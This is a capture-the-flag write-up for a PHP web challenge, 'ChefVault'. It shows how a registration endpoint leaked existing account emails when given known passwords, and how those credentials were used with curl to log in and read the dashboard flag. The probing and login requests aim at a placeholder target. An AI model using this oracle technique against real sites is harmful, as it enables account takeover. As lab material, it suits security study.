ChefVault: La recette secrete 1

ChefVault la recette secrete 1 · Apr 08, 2026

Cyber Saguenay CTF Web phpauthoraclecredential-disclosure

ChefVault: La recette secrete 1

Summary

ChefVault was a PHP web authentication challenge. The solve used the registration endpoint as a password-oracle to discover valid credentials, then logged in and read the authenticated dashboard content.

Evidence

  • register.php accepted JSON input with email and password fields.
  • Supplying specific existing password values leaked existing account emails.
  • The leaked account credential successfully authenticated and redirected to dashboard.php.
  • The dashboard displayed the first challenge flag for an authenticated user role.

Steps

  1. Fetch the login and registration pages to identify the request shape.
curl -sS -i "http://<TARGET_IP>:1337/"
curl -sS -i "http://<TARGET_IP>:1337/register.php"
  1. Fuzz register.php with JSON values. The important behavior was that known password values caused the backend to leak associated emails.
POST /register.php HTTP/1.1
Host: <TARGET_IP>:1337
Content-Type: application/json

{"email":"probe@example.com","password":"<KNOWN_PASSWORD>"}
  1. Use the leaked credentials to log in.
curl -sS -i -c /tmp/chef_admin.cookies \
  -X POST "http://<TARGET_IP>:1337/index.php" \
  --data "email=<LEAKED_EMAIL>&password=<LEAKED_PASSWORD>"
  1. Fetch the dashboard with the authenticated cookie.
curl -sS -i -b /tmp/chef_admin.cookies \
  "http://<TARGET_IP>:1337/dashboard.php"

Flag

Recovered, but redacted in the local notes as UQAC{[REDACTED]}.

Notes

The root cause was a registration/password uniqueness oracle that disclosed existing account emails. No JWT role escalation was required for the first flag.